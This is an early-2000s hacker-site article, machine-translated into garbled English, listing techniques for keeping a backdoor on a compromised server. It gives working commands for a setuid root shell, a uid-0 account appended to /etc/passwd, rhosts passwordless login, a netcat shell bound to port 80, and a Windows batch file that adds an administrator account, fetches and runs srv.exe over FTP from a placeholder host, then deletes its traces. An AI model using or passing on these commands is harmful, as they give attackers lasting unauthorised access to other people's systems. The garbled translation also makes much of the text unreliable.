Common opens back door technique |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analysis>> common opens the back 
                  door technique  Printing

            Common opens the back door technique 
            Www.cshu.net  2002-8-28  fog rain village 

              Common keeps the back door technique. 
              F-king 
              Regarding we such vegetable, did too the server not to be very 
              easy with great difficulty, if has been discovered on k. Ha-ha 
              Actually, operates the back door the method to have very many 
              kinds, under I, I before has studied several methods 
              1. setuid 
              #cp /bin/sh /tmp/ root 
              #chmod u+s /tmp/ root 
              Adds on the suid position to shell on, although is very simple, 
              but easily was discovered 

              2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd 
              Namely increases id is 0 (root) the account number for the system, 
              astomia command; 
              But the manager orders with find to be allowed to discover, ha-ha 
              - 
              3.echo "+ hack" >>/ rhosts 
              If this system has opened 5.12,513 million port ha-ha, may 
              Adds to rhosts in the document named hack, rlogin lands, does not 
              need the password 

              4. Revises the sendmail.cf document to increase "wiz the" order; 
              After then telnet www.xxx.com 25, wiz. . . . Ok 

              5. rootkit backdoor 
              Ha-ha. These things now are very exactly the hot thing, but 
              careful this after document serviceability, date and so on some 
              small details. 
              Otherwise. . . . . 
              Some need own to translate, some are translates. 
              7.remote shell 
              Sunx which is backdoor very good, does not return produces the 
              diary document, prevents who. Ha-ha. Needs to translate 
              But moves in redhat 6.1 is very good. But in 7.1 and so on in the 
              edition resembles on a little bug 
              Perhaps may bindshell 
              May replace in inetd.conf not the commonly used service, the 
              attention document revision time. 
              8. http back door 
              Ha-ha, the common firewall are actually few to the web service 
              limit very, therefore we may obtain from here, here need uses the 
              end to like salty food the direction detection 
              Simple said is the http service which web opens has 2, is http 
              itself, is remote shell perhaps bindshell 
              The firewall filters other all port, the prohibition reverse 
              connects, I depend on! Simple is may use nc. (netcat ha-ha this) 
              ties up cmd.exe decides 
              Comes up to 80 ports. Telnet www.xxx.com 80 then obtains shell 
              Or! May use asp, the back door which code and so on php.cgi 
              writes, also may do the same effect! 
              9.bat back door (&#21019;) 
              If is the xnix server. Does not have the means. . . 
              Ms server: 
              Backdoor.bat 
              Net user hacker windychild /add 
              Net localgroup administrators hacker /add.. create super admin 
              user 
              Echo open www.xxx.com>c:\ftp.txt 
              Echo xxx>>c:\ftp.txt 
              Echo xxxxxx>>c:\ftp.txt 
              Echo get srv.exe>>c:\ftp.txt 
              Echo bye>>c:\ftp.txt 
              Ftp -s:c:\ftp.txt 
              Copy srv.exe c:\winnt\ 
              C:\winnt\srv.exe 
              Del c:\ftp.txt 
              Del c:\srv.exe..... May own establish the wooden horse or the back 
              door and so on 
              ... Or you may inscribe open 3,389 services, the telnet sentence 
              Other, opening sharing service! 
              Net share ipc=ip 
              Net share hdc= 
              ...... 
              If ruthless spot, simply again gives on it rootkit for win, dusk, 
              but also wants this bat to make any. . . 
              10, may use the mail code loophole, own establish base64 the code 
              document to issue you the friend 
              Then exe transforms the back door the mail code. 
              Ha-ha the concrete method I look like have looked, but did not 
              know in there. 
              . . . . 
              Actually, the above method all is the very common method, but also 
              has very many methods, does not have the means to reorganize for a 
              while. 
              But said enough regarding the novice! 



              Original author: Fking 
              Origin: Is unclear 
              Altogether has 235 readers to read this article 

              [Tells friend] 
            Previous article:JavaScript master data structure 

            Next article: Already did not have 

            - this week popular article - related article 
            Common opens the back door technique 



      CSHU 
